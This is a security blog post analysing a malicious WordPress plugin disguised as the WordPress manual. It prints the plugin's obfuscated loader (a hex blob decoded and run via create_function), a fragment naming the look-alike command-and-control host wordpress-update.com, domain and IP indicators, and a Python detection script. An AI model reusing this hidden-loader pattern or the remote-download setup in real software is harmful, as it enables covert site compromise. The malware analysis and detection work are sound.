Fake wordpress-update.com site used to distribute malware via malicious plugins.

In recent days, we have worked on several infected WordPress websites that all had one thing in common: the same malicious plugin was installed on each of them.

Hackers gained access to the admin dashboard, uploaded it and enabled it.
The plugin claims to be the WordPress online manual (!).

This is what the plugin code looks like:

<?php
/**
 *
 * @package     Docs
 * @version     1.1.0
 * @author      WordPress.com <wordpress.com>
 * @copyright   Copyright (c) 2012, WordPress.com
 * @license     http://opensource.org/licenses/gpl-2.0.php GPL v2 or later
 * @link        http://wordpress.com
 * @description Welcome, the online manual for WordPress and a living repository for WordPress information and documentation.
 */
/*
Plugin Name: Docs
Plugin URI: http://wordpress.com
Description: Welcome, the online manual for WordPress and a living repository for WordPress information and documentation.
Version: 1.1.0
Author: WordPress.com
Author URI: http://wordpress.com
License: GPLv2 or later
*/

$lLzmx = "6966282166756e6374696f6e5f6578...[TRUNCATED CODE].......657869743b0a09097d0a097d0a7d";
if(!function_exists("hex2asc")){
    function hex2asc($in){
        $out = "";
        $j=strlen($in)/2;
        for($i=0;$i<$j;$i++){
            $out.=chr(
                base_convert(substr($in,$i*2,2),16,10)
            );
        }
        return $out;
    }
}
$lLzmx = create_function(null, hex2asc($lLzmx));
$lLzmx();
?>

This is only a truncated version; you can see the full code in our Malware Threats Report #20151027#11, which includes the raw plugin, its de-obfuscated version and, in the third window, the code remotely downloaded by the plugin.

The plugin connects to a fake wordpress-update.com website:

class Docs_Plugin {
        private $_host;
        private $_server = "http://wordpress-update.com/";
        private $_uri = FALSE;
        private $_pluginPath;
        private $_cacheFolder;
        function __construct(){
...
...

It downloads a lot of data, which is stored in the /wp-content/plugins/Docs/cache/ folder. Every file is named after an MD5 hash (computed from the $_SERVER['REQUEST_URI'] server variable, i.e. the requested URL) with a .dat extension, so one file is created per distinct URL visited and there can be thousands of them.
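As an added example (not code from the original post or from the plugin itself), the following Python triage script covers the two indicators described above: a hex blob that is decoded by hex2asc() and handed to create_function(), and a cache/ folder full of 32-hex-character .dat files. The regular expressions are written for the exact pattern used by this plugin; other samples use eval()/base64_decode() and similar sinks and would need their own patterns. The plugin tree it scans is constructed inside a temporary directory for demonstration; only the visible prefix and suffix of the page's hex blob are real (they decode to `if(!function_ex` and `exit;` followed by closing braces).

```python
"""Triage helper for the obfuscated "Docs" plugin (added example, not the original code)."""
import hashlib
import re
import tempfile
from pathlib import Path

# A hex blob assignment such as   $lLzmx = "6966...";
HEX_ASSIGN = re.compile(r'\$(?P<var>\w+)\s*=\s*"(?P<hex>[0-9a-fA-F]{16,})"\s*;')
# The dynamic-code sink the plugin uses:   create_function(null, hex2asc($lLzmx))
EVAL_SINK = re.compile(r'create_function\s*\(\s*null\s*,\s*hex2asc\s*\(\s*\$(?P<var>\w+)\s*\)\s*\)')
# Cache artifacts: md5(REQUEST_URI) + ".dat"
CACHE_NAME = re.compile(r'^[0-9a-f]{32}\.dat$')
# Domains named in the post
IOC_DOMAINS = ("wordpress-update.com", "wordpress-update.org")


def hex2asc(hexstr: str) -> str:
    """Python port of the plugin's own hex2asc(): two hex digits per byte.
    An odd-length string is handled like the PHP loop (last nibble on its own)."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def decode_payloads(php_source: str) -> dict:
    """Return {var: decoded_code} for each hex blob that reaches create_function(null, hex2asc($var)).
    Only one layer is decoded; re-run on the result if a sample nests another layer."""
    blobs = {m.group("var"): m.group("hex") for m in HEX_ASSIGN.finditer(php_source)}
    sinks = {m.group("var") for m in EVAL_SINK.finditer(php_source)}
    return {var: hex2asc(blobs[var]) for var in sinks if var in blobs}


def find_iocs(text: str) -> set:
    """Known command-and-control domains present in (decoded) code."""
    return {d for d in IOC_DOMAINS if d in text}


def scan_plugin_tree(root) -> dict:
    """Walk a wp-content/plugins tree and report
    - PHP files whose hex blob reaches create_function(), with the IOCs found after decoding
    - cache/ folders holding md5-named .dat files, with their count"""
    root = Path(root)
    report = {"obfuscated_php": {}, "cache_dirs": {}}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix == ".php":
            decoded = decode_payloads(path.read_text(errors="replace"))
            if decoded:
                iocs = set()
                for code in decoded.values():
                    iocs |= find_iocs(code)
                report["obfuscated_php"][str(path.relative_to(root))] = sorted(iocs)
        elif path.is_dir() and path.name == "cache":
            n = sum(1 for f in path.iterdir() if f.is_file() and CACHE_NAME.match(f.name))
            if n:
                report["cache_dirs"][str(path.relative_to(root))] = n
    return report


def build_demo_tree(base) -> Path:
    """Constructed sample, NOT the real plugin: a 'Docs' plugin whose hex blob decodes
    to a stub containing the C2 URL, plus a cache/ folder with md5-named .dat files."""
    plugin = Path(base) / "Docs"
    (plugin / "cache").mkdir(parents=True)
    inner = 'if(!function_exists("docs_run")){ $server = "http://wordpress-update.com/"; }'
    blob = inner.encode("latin-1").hex()
    php = ("<?php\n/*\nPlugin Name: Docs\n*/\n"
           f'$lLzmx = "{blob}";\n'
           "$lLzmx = create_function(null, hex2asc($lLzmx));\n$lLzmx();\n")
    (plugin / "docs.php").write_text(php)
    for uri in ("/", "/about/", "/contact/"):           # one .dat per requested URL
        name = hashlib.md5(uri.encode()).hexdigest() + ".dat"
        (plugin / "cache" / name).write_text("cached response")
    (plugin / "cache" / "index.php").write_text("<?php // benign placeholder\n")
    return plugin


def demo() -> dict:
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_plugin_tree(tmp)


if __name__ == "__main__":
    print(demo())
```

On a real site, point scan_plugin_tree() at wp-content/plugins and compare the decoded payload against the de-obfuscated version in the report; a hit on the sink pattern alone is already enough to quarantine the plugin, since legitimate plugins have no reason to hide their code this way.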

A quick look at the domain name shows that it was registered with NameSilo LLC on 18-jun-2015:

$ whois wordpress-update.com

Whois Server Version 2.0

   Domain Name: WORDPRESS-UPDATE.COM
   Registrar: NAMESILO, LLC
   Sponsoring Registrar IANA ID: 1479
   Whois Server: whois.namesilo.com
   Referral URL: http://www.namesilo.com
   Name Server: NS1.ADMINVPS.RU
   Name Server: NS2.ADMINVPS.RU
   Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
   Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
   Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
   Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
   Updated Date: 24-jun-2015
   Creation Date: 18-jun-2015
   Expiration Date: 18-jun-2016

Its IP address shows that it is currently hosted by the German hosting company Hetzner Online GmbH:

$ host -t a wordpress-update.com
wordpress-update.com has address 136.243.243.205


$ whois 136.243.243.205 | grep netname:
netname:        HETZNER-RZ-BLK-ERX3

This is neither the first nor the last case of a look-alike domain registered for malicious purposes. For instance, we noticed a wordpress-update.org (176.9.31.199) which is also hosted by Hetzner.